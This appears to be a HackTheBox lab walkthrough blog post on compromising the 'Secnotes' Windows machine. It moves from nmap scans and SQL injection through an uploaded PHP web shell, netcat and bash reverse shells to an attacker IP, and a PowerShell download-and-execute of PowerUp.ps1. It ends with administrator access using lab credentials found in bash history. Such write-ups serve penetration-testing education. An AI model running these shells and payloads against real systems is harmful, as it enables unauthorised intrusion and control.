Secnotes : Hackthebox walkthrough

Secnotes : Hackthebox walkthrough

Hey everyone! This is shreya and the blog post covers the step by step guide to pwn secnotes from hackthebox.

Secnotes is a medium windows machine. Initial foothold on the box is based on exploiting the sqli on the login page where we get the creds to access smb share. Since we have read.write access on the share, we will be exploiting it to get a shell with user. The privilege escalation to root requires a bit of recon to find the .exe that is run bash on windows. Once inside the bash terminal, viewing the bash_history will give the creds for administrator.

Enough of spoilers!! Now, lets get started.

Starting with nmap scan, I found a few open ports

# nmap -sC -sV -o secnotes.nmap 10.10.10.97

Nmap scan report for 10.10.10.97
Host is up (0.68s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
| http-title: Secure Notes – Login
|_Requested resource was login.php
445/tcp open microsoft-ds Windows 10 Enterprise 17134 microsoft-ds (workgroup: HTB)
Service Info: Host: SECNOTES; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 2h23m58s, deviation: 4h02m32s, median: 3m56s
| smb-os-discovery:
| OS: Windows 10 Enterprise 17134 (Windows 10 Enterprise 6.3)
| OS CPE: cpe:/o:microsoft:windows_10::-
| Computer name: SECNOTES
| NetBIOS computer name: SECNOTES\x00
| Workgroup: HTB\x00
|_ System time: 2020-05-27T02:10:17-07:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-05-27 14:40:15
|_ start_date: N/A

I have a habit to always run a full port scan while i do some manual enumeration. And this time, I found one.

# nmap -p- -sS -sV -A -T4 -vv 10.10.10.97 -o fullport.nmap

8808/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows

I tried accessing smb as guest, but access was denied.
Moving further, we have 2 ports with http up and running.
So lets checkout port 8808

I was merely a page having nothing userful.

Initial Foothold

Moving to port 80, Login.php landed. It also had the option to sign up. So i quickly followed the link and registered an user

Upon logging in, home.php landed

Please contact tyler@secnotes.htb implied that the probable user name is tyler. Also, it was clearly visible that the user’s name is been reflected on the site therefore a sqli might be possible.

There was contact.php to send messages to tyler.

As I said earlier, login.php was vulnerable to sqli, with payload ‘ or ‘1’=’1
So I registered the user with this payload and same password as the user.

Upon logging in with ‘ or ‘1’=’1, the page displayed all the notes created by all the users on the box. A few of them were notes by tyler where creds were present.

\\secnotes.htb\new-site
tyler / 92g!mA8BGjOirkL%OG*&

# smbclient \\\\10.10.10.97\\new-site -U tyler

The contents seemed to be the one that was hosted on port 8808. That implies that the site is hosted with contents of smb share. Having write access on the machine means that now i can upload a shell through smb.

I uploaded a basic php shell and nc.exe to get a reverse shell.

<?php echo system($_REQUEST['cmd']); ?>

Getting the user.txt

Executing whoami gave the username. Ie we’ll be getting a user shell.

So i opened up a nc listener and ran the basic one liner for reverse shell from pentest monkey

http://secnotes.htb:8808/cmd.php?cmd=nc.exe%2010.10.14.7%209001%20-e%20cmd.exe

So we r now tyler. Lets grab the user.txt

Privilege escalation to Administrator

Up next, I downloaded PowerUp.ps1 to enumerate for any loophole and ran Invoke-AllChecks

# powershell
# IEX (New-Object Net.WebClient).DownloadString(‘http://10.10.14.7/PoweUp.ps1’)

Setup python server on the local machine to grab the file

# python -m SimpleHTTPServer

On windows box run,

# Invoke-AllChecks

Running Invoke-AllChecks didn’t return anything juicy, so I started off with manual enumeration.

Inside tyler’s desktop folder, I found different lnk files. One of them was bash.lnk.

That means that bash is present on the box, so i grabbed for the contents of bash.lnk and found the path to bash.exe

I cd into the specified file, but bash.exe didnt existed there. This was something weird.

Then i thought of doing a recursive search for a file (bash.exe) using powershell inside the directory C:\Windows.

> Get-ChildItem -Path C:\Windows -Filter bash.exe -Recurse -ErrorAction SilentlyContinue -Force

And got a weird directory

I went to that directory and entered a simple one liner bash reverse shell from pentest monkey and spawned up a nc listener on the local machine.

>  .\bash.exe -c "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.7 8888 >/tmp/f"

And got root!!

But it is not the administrator. So i started to go through the contents. And I found .bash_history. In a hope to find something interesting, I listed its contents. And guess what, there were smb creds set for administrator!!

# cd /root
# ls -la
total 8
drwx—— 1 root root 512 Jun 22 2018 .
drwxr-xr-x 1 root root 512 Jun 21 2018 ..
———- 1 root root 398 Jun 22 2018 .bash_history
-rw-r–r– 1 root root 3112 Jun 22 2018 .bashrc
-rw-r–r– 1 root root 148 Aug 17 2015 .profile
drwxrwxrwx 1 root root 512 Jun 22 2018 filesystem

# cat .bash_history
cd /mnt/c/
ls
cd Users/
cd /
cd ~
ls
pwd
mkdir filesystem
mount //127.0.0.1/c$ filesystem/
sudo apt install cifs-utils
mount //127.0.0.1/c$ filesystem/
mount //127.0.0.1/c$ filesystem/ -o user=administrator
cat /proc/filesystems
sudo modprobe cifs
smbclient
apt install smbclient
smbclient
smbclient -U ‘administrator%u6!4ZwgwOM#^OBf#Nwnh’ \\\\127.0.0.1\\c$
> .bash_history
less .bash_history
exit#

The password for administrator is u6!4ZwgwOM#^OBf#Nwnh

Lets try the psexec.py from Impacket to get login as administrator.

# psexec.py administrator@10.10.10.97

We are now administrator. 

Thats all for the blog post. If you enjoyed reading, do like the post!

For more hackthebox writeups, visit here

shreyapohekar

I’m Shreya Pohekar, a Senior Product Security Analyst at HackerOne. I enjoy sharing my thoughts and insights through blogging, turning complex security topics into engaging and accessible content for my readers.

Leave a Reply